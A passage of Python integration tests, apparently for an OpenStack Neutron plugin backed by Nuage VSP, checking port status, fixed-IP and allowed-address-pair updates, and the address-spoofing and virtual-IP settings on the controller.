"""Wrapper utility that shows a given port."""
body = self.ports_client.show_port(port_id)
return body['port']
def _create_server(self, name, network, port_id=None):
keypair = self.create_keypair()
network = {'uuid': network['id']}
if port_id is not None:
network['port'] = port_id
return self.create_server(
name=name,
networks=[network],
key_name=keypair['name'],
wait_until='ACTIVE')
def _delete_server(self, server_id, clients=None):
if clients is None:
clients = self.os_primary
clients.servers_client.delete_server(server_id)
waiters.wait_for_server_termination(clients.servers_client, server_id)
@decorators.attr(type='smoke')
def test_nuage_dhcp_port_create_check_status(self):
network = self.create_network()
self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
filters = {
'device_owner': 'network:dhcp:nuage',
'network_id': network['id']
}
dhcp_port = self.ports_client.list_ports(**filters)['ports'][0]
self.assertEqual('ACTIVE', dhcp_port['status'])
@decorators.attr(type='smoke')
def test_nuage_dhcp_port_with_router_detach_check_status(self):
network = self.create_network()
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"],
cleanup=False)
self.routers_client.remove_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
filters = {
'device_owner': 'network:dhcp:nuage',
'network_id': network['id']
}
dhcp_port = self.ports_client.list_ports(**filters)['ports'][0]
self.assertEqual('ACTIVE', dhcp_port['status'])
@decorators.attr(type='smoke')
def test_nuage_port_create_show_check_status(self):
network = self.create_network()
self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
port = self.create_port(network)
self.assertEqual('DOWN', port['status'])
port = self.show_port(port['id'])
# state has to remain DOWN as long as port is not bound
self.assertEqual('DOWN', port['status'])
@decorators.attr(type='smoke')
def test_nuage_port_create_server_create_delete_check_status(self):
network = self.create_network()
self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=24)
port = self.create_port(network)
server = self._create_server('s1', network, port['id'])
port = self.show_port(port['id'])
self.assertEqual('ACTIVE', port['status'])
self._delete_server(server['id'])
port = self.show_port(port['id'])
self.assertEqual('DOWN', port['status'])
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_negative(self):
# Set up resources
# Base resources
if self.is_dhcp_agent_present():
raise self.skipException(
'Cannot run this test case when DHCP agent is enabled')
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
subnet2 = self.create_subnet(network, cidr=IPNetwork("192.168.3.11/24"),
mask_bits=28)
self.assertIsNotNone(subnet2, "Unable to create second subnet")
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "172.16.31.10",
"subnet_id": subnet2["id"]
}
]
# Fail
msg = "Port can't have multiple IPv4 IPs of different subnets"
self.assertRaisesRegex(exceptions.BadRequest,
msg,
self.create_port,
network=network, fixed_ips=fixed_ips)
@testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
def test_nuage_os_managed_subnet_port_create_with_nuage_policy_negative(
self):
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
msg = ("Cannot use VSP policy groups on OS managed subnets,"
" use neutron security groups instead.")
self.assertRaisesRegex(exceptions.BadRequest,
msg,
self.create_port,
network=network,
nuage_policy_groups=['Random_value'])
@testtools.skipIf(Topology.before_nuage('5.4'), 'Unsupported pre-5.4')
def test_nuage_os_managed_subnet_port_update_with_nuage_policy_negative(
self):
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
port = self.create_port(network=network)
self.assertIsNotNone(port, "Unable to create port")
msg = ("Cannot use VSP policy groups on OS managed subnets,"
" use neutron security groups instead.")
self.assertRaisesRegex(exceptions.BadRequest,
msg,
self.update_port,
port=port,
nuage_policy_groups=['Random_value'])
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_negative(self):
if self.is_dhcp_agent_present():
raise self.skipException(
'Multiple subnets in a network not supported when DHCP agent '
'is enabled.')
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
subnet2 = self.create_subnet(network, cidr=IPNetwork("192.168.3.11/24"),
mask_bits=28)
self.assertIsNotNone(subnet2, "Unable to create second subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
self.create_router_interface(router_id=router["id"],
subnet_id=subnet2["id"])
# Create port
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.update_port(port=port, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to update port")
self.assertEqual(port["fixed_ips"][0]["ip_address"], "10.0.0.5",
message="The port did not update properly.")
# Update to subnet2 should fail
fixed_ips = [
{
"ip_address": "172.16.31.10",
"subnet_id": subnet2["id"]
}
]
try:
self.update_port(port=port, fixed_ips=fixed_ips)
self.fail("Exception expected when updating to"
" a different subnet!")
except exceptions.BadRequest as e:
if "Updating fixed ip of port" in e._error_string:
pass
else:
# Differentiate between VSD failure and update failure
LOG.debug(e._error_string)
self.fail("A different NuageBadRequest exception"
" was expected for this operation.")
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_l2(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.L2_DOMAIN,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_subnet_l2(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.L2_DOMAIN,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.update_port(port=port, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_l3(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4']
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_l3_no_security(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips,
port_security_enabled=False)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4']
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_subnet_l3_no_security(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.5',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network,
fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.update_port(port=port, fixed_ips=fixed_ips,
allowed_address_pairs=[],
security_groups=[],
port_security_enabled=False)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4']
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_subnet_l3(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
port = self.update_port(port=port, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4']
vip_mismatch = False
mac_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
if nuage_vport_vip['MAC'] != port['mac_address']:
mac_mismatch = True
self.assertEqual(vip_mismatch, False)
self.assertEqual(mac_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_l2_with_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.50',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.L2_DOMAIN,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_subnet_l2_with_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.L2_DOMAIN,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.50',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.update_port(port=port,
fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.L2_DOMAIN,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_l3_with_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_create_fixed_ips_same_subnet_l3_with_aap_outside_cidr(
self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '1.1.1.5',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.ENABLED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4']
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_subnet_l3_with_aap(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
}
]
port = self.create_port(network=network, fixed_ips=fixed_ips)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.update_port(port=port, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = ['10.0.0.4', allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_fixed_ips_same_subnet_l3_with_aap_with_vm(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.10',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
self._create_server(name='vm-' + network['name'],
network=network, port_id=port['id'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.6",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.7',
'mac_address': 'fe:a0:36:4b:c8:70'},
{'ip_address': '10.0.0.10',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.update_port(port=port, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address'],
allowed_address_pairs[1]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
@decorators.attr(type='smoke')
def test_nuage_port_update_app_to_fixed_ips_l3_with_vm(self):
# Set up resources
# Base resources
network = self.create_network()
self.assertIsNotNone(network, "Unable to create network")
subnet = self.create_subnet(network, cidr=IPNetwork("10.0.0.0/24"),
mask_bits=28)
self.assertIsNotNone(subnet, "Unable to create subnet")
router = self.create_router(
admin_state_up=True,
external_network_id=CONF.network.public_network_id)
self.assertIsNotNone(router, "Unable to create router")
# Attach subnet
self.create_router_interface(router_id=router["id"],
subnet_id=subnet["id"])
fixed_ips = [
{
"ip_address": "10.0.0.4",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.6',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.create_port(network=network, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to create port on network")
vsd_vport_parent = self.vsd_client.get_global_resource(
constants.SUBNETWORK,
filters='externalID',
filter_value=subnet['id'])[0]
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
self.assertEqual(vip_mismatch, False)
self._create_server(name='vm-' + network['name'],
network=network, port_id=port['id'])
# update within subnet should succeed
fixed_ips = [
{
"ip_address": "10.0.0.5",
"subnet_id": subnet["id"]
},
{
"ip_address": "10.0.0.6",
"subnet_id": subnet["id"]
}
]
allowed_address_pairs = [{'ip_address': '10.0.0.7',
'mac_address': 'fe:a0:36:4b:c8:70'},
{'ip_address': '10.0.0.10',
'mac_address': 'fe:a0:36:4b:c8:70'}]
port = self.update_port(port=port, fixed_ips=fixed_ips,
allowed_address_pairs=allowed_address_pairs)
self.assertIsNotNone(port, "Unable to update port")
nuage_vport = self.vsd_client.get_vport(
constants.SUBNETWORK,
vsd_vport_parent['ID'],
filters='externalID',
filter_value=port['id'])
self.assertEqual(constants.INHERITED,
nuage_vport[0]['addressSpoofing'])
nuage_vport_vips = self.vsd_client.get_virtual_ip(
constants.VPORT,
nuage_vport[0]['ID'])
valid_vips = [fixed_ips[0]["ip_address"],
allowed_address_pairs[0]['ip_address'],
allowed_address_pairs[1]['ip_address']]
vip_mismatch = False
if valid_vips and not nuage_vport_vips:
vip_mismatch = True
for nuage_vport_vip in nuage_vport_vips:
if nuage_vport_vip['virtualIP'] not in valid_vips:
vip_mismatch = True
